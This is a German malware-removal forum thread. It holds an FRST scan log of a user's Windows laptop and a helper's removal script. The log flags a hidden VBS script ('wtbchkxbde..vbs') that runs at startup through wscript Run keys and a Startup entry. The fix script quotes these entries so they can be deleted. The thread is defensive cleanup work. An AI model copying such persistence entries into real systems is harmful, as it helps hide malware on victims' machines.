(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
(Acer Group) C:\Program Files\Acer\Acer Updater\UpdaterService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
(Alcor Micro Corp.) C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Microsoft Corporation) C:\Windows\System32\wscript.exe
(Locktime Software) C:\Program Files\NetLimiter 3\NLClientApp.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apntex.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidFind.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LManager.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\MMDx64Fx.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMworker.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTray.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerEvent.exe
(Intel Corporation) C:\Windows\system32\igfxext.exe
(Intel Corporation) C:\Windows\system32\igfxsrvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaire.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
(Panda Security) C:\Program Files (x86)\Panda USB Vaccine\USBVaccine.exe


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [323584 2009-09-23] (Alcor Micro Corp.)
HKLM\...\Run: [mwlDaemon] => C:\Program Files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe
HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [166424 2010-04-21] (Intel Corporation)
HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe [391192 2010-04-21] (Intel Corporation)
HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe [413720 2010-04-21] (Intel Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [9996320 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [877600 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [585376 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [354464 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [345648 2010-03-09] (Alps Electric Co., Ltd.)
HKLM\...\Run: [Acer ePower Management] => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe [496160 2010-02-02] (Acer Incorporated)
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation)
HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKLM-x32\...\Run: [BackupManagerTray] => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [260608 2010-03-09] (NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-04-21] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [960080 2010-05-26] (Dritek System Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [689744 2014-02-20] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
HKLM-x32\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs"
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [NetLimiter] => C:\Program Files\NetLimiter 3\NLClientApp.exe [2910208 2011-03-21] (Locktime Software)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com.ph/intl/en/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deDE532
BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - c:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Microsoft-Konto-Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)

FireFox:
========
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.0.6 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)

Chrome:
=======
CHR Plugin: (Shockwave Flash) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\PepperFlash\11.7.700.202\pepflashplayer.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Extension: (Google Docs) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-05-15]
CHR Extension: (Google Drive) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-05-15]
CHR Extension: (YouTube) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-05-15]
CHR Extension: (Google-Suche) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-05-15]
CHR Extension: (Google Wallet) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-10]

==================== Services (Whitelisted) =================

R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [820768 2010-02-02] (Acer Incorporated)
R2 nlsvc; C:\Program Files\NetLimiter 3\nlsvc.exe [1845248 2011-03-21] (Locktime Software)
R2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [260640 2010-01-29] (Acer Incorporated)

==================== Drivers (Whitelisted) ====================

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [108440 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131576 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-12-15] (Avira Operations GmbH & Co. KG)
R1 nltdi; C:\Program Files\NetLimiter 3\nltdi.sys [88200 2011-03-21] (Locktime Software)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

2014-04-17 23:36 - 2014-04-17 23:36 - 00015867 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-17 23:35 - 2014-04-17 23:35 - 00001084 _____ () C:\Users\Franz\Desktop\checkup.txt
2014-04-17 21:07 - 2014-04-17 21:07 - 00987448 _____ () C:\Users\Franz\Desktop\SecurityCheck.exe
2014-04-16 23:57 - 2014-04-16 23:59 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt
2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 23:07 - 2014-04-16 23:10 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-04-16 23:06 - 2014-04-03 09:51 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-04-16 23:06 - 2014-04-03 09:51 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-04-16 23:06 - 2014-04-03 09:50 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-04-16 02:56 - 2014-04-16 03:44 - 00000000 ____D () C:\Qoobox
2014-04-16 02:56 - 2014-04-16 03:35 - 00000000 ____D () C:\Windows\erdnt
2014-04-16 02:56 - 2011-06-26 08:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-04-16 02:56 - 2010-11-07 19:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-04-16 02:56 - 2009-04-20 06:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00098816 _____ () C:\Windows\sed.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00080412 _____ () C:\Windows\grep.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00068096 _____ () C:\Windows\zip.exe
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-16 02:47 - 2014-04-16 02:48 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe
2014-04-14 11:21 - 2008-03-22 04:21 - 733980672 ___SH () C:\Users\Franz\Desktop\The Seeker-The Dark is Rising[2007]DvDrip[Eng]-FXG.avi
2014-04-14 11:19 - 2012-11-07 09:32 - 247528059 ___SH () C:\Users\Franz\Desktop\Amityville Horror 2 The Possession (Full Movie) - YouTube.flv
2014-04-14 11:19 - 2010-01-05 16:04 - 956607690 ___SH () C:\Users\Franz\Desktop\The Marine 2 (2010) DVDR DivXNL-Team.avi
2014-04-14 10:43 - 2014-04-17 23:36 - 00000000 ____D () C:\FRST
2014-04-14 10:40 - 2014-04-14 10:42 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-11 05:39 - 2014-03-04 14:07 - 142602520 _____ (Microsoft Corporation) C:\Users\Franz\Desktop\wlsetup-all_16.4.3508.0205.exe
2014-04-07 09:32 - 2014-04-09 10:19 - 00000000 ____D () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-03 10:10 - 2014-04-12 01:15 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-02 08:42 - 2014-04-16 22:12 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:19 - 2014-04-02 08:54 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 06:29 - 2013-02-01 10:07 - 557660892 _____ () C:\Users\Franz\Desktop\Bavaria Traumreise durch Bayern.mkv
2014-04-02 06:15 - 2013-03-03 06:17 - 3702646581 _____ () C:\Users\Franz\Desktop\Das grüne Wunder - Unser Wald.mkv
2014-04-01 04:51 - 2013-09-22 17:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001
2014-03-21 07:44 - 2014-03-24 01:36 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games
2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu

==================== One Month Modified Files and Folders =======

2014-04-17 23:36 - 2014-04-17 23:36 - 00015867 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-17 23:36 - 2014-04-14 10:43 - 00000000 ____D () C:\FRST
2014-04-17 23:35 - 2014-04-17 23:35 - 00001084 _____ () C:\Users\Franz\Desktop\checkup.txt
2014-04-17 23:28 - 2013-04-16 20:09 - 00001108 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-04-17 23:14 - 2013-04-16 20:29 - 00000043 _____ () C:\Users\Public\Documents\AtherosServiceConfig.ini
2014-04-17 23:14 - 2013-04-16 19:13 - 01673821 _____ () C:\Windows\WindowsUpdate.log
2014-04-17 21:07 - 2014-04-17 21:07 - 00987448 _____ () C:\Users\Franz\Desktop\SecurityCheck.exe
2014-04-17 08:28 - 2013-04-16 20:09 - 00001104 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-04-17 05:53 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-04-17 05:53 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-04-17 05:33 - 2009-07-14 07:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-04-17 05:32 - 2009-07-14 06:51 - 00088400 _____ () C:\Windows\setupact.log
2014-04-17 02:07 - 2013-04-17 05:01 - 00696870 _____ () C:\Windows\system32\perfh007.dat
2014-04-17 02:07 - 2013-04-17 05:01 - 00148134 _____ () C:\Windows\system32\perfc007.dat
2014-04-17 02:07 - 2009-07-14 07:13 - 01612484 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-04-17 00:00 - 2014-03-11 17:56 - 00000000 ____D () C:\AdwCleaner
2014-04-17 00:00 - 2010-05-11 01:15 - 00113344 _____ () C:\Windows\PFRO.log
2014-04-16 23:59 - 2014-04-16 23:57 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt
2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 23:10 - 2014-04-16 23:07 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-04-16 22:12 - 2014-04-02 08:42 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-16 03:44 - 2014-04-16 02:56 - 00000000 ____D () C:\Qoobox
2014-04-16 03:43 - 2009-07-14 05:20 - 00000000 __RHD () C:\Users\Default
2014-04-16 03:35 - 2014-04-16 02:56 - 00000000 ____D () C:\Windows\erdnt
2014-04-16 03:15 - 2009-07-14 04:34 - 00000215 _____ () C:\Windows\system.ini
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-16 02:48 - 2014-04-16 02:47 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe
2014-04-15 10:30 - 2013-04-16 20:22 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\vlc
2014-04-14 10:42 - 2014-04-14 10:40 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-14 10:20 - 2013-04-16 21:29 - 00000000 ____D () C:\Setups
2014-04-12 01:15 - 2014-04-03 10:10 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-09 11:28 - 2013-04-16 19:54 - 00000000 ___RD () C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-04-09 10:19 - 2014-04-07 09:32 - 00000000 ____D () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-06 08:23 - 2013-04-16 20:09 - 00004104 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-04-06 08:23 - 2013-04-16 20:09 - 00003852 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-04-03 09:51 - 2014-04-16 23:06 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-04-03 09:51 - 2014-04-16 23:06 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-04-03 09:50 - 2014-04-16 23:06 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-04-02 08:54 - 2014-04-02 08:19 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:25 - 2013-04-16 20:39 - 00000000 ___RD () C:\Users\Franz\Desktop\Dropbox
2014-04-02 08:24 - 2013-04-16 20:35 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Dropbox
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 08:03 - 2013-04-16 20:10 - 00002179 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-03-31 04:12 - 2014-02-28 13:54 - 00000000 ____D () C:\Users\Franz\Desktop\Fotos
2014-03-27 00:58 - 2013-10-03 22:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\uTorrent
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001
2014-03-24 01:36 - 2014-03-21 07:44 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games
2014-03-23 13:40 - 2014-02-28 13:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\iFunbox_UserCache
2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu

Some content of TEMP:
====================
C:\Users\Franz\AppData\Local\Temp\avgnt.exe
C:\Users\Franz\AppData\Local\Temp\Quarantine.exe
C:\Users\Franz\AppData\Local\Temp\{04F28610-2CBA-4508-A95B-D654F15084A8}-34.0.1847.116_33.0.1750.154_chrome_updater.exe


==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit


LastRegBack: 2014-03-24 00:49

==================== End Of Log ============================

--- --- ---

schrauber 18.04.2014 17:01

Erstmal haben wir alles runum gekillt

Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument

Code:

HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKLM-x32\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs"
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()
2014-04-01 04:51 - 2013-09-22 17:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs


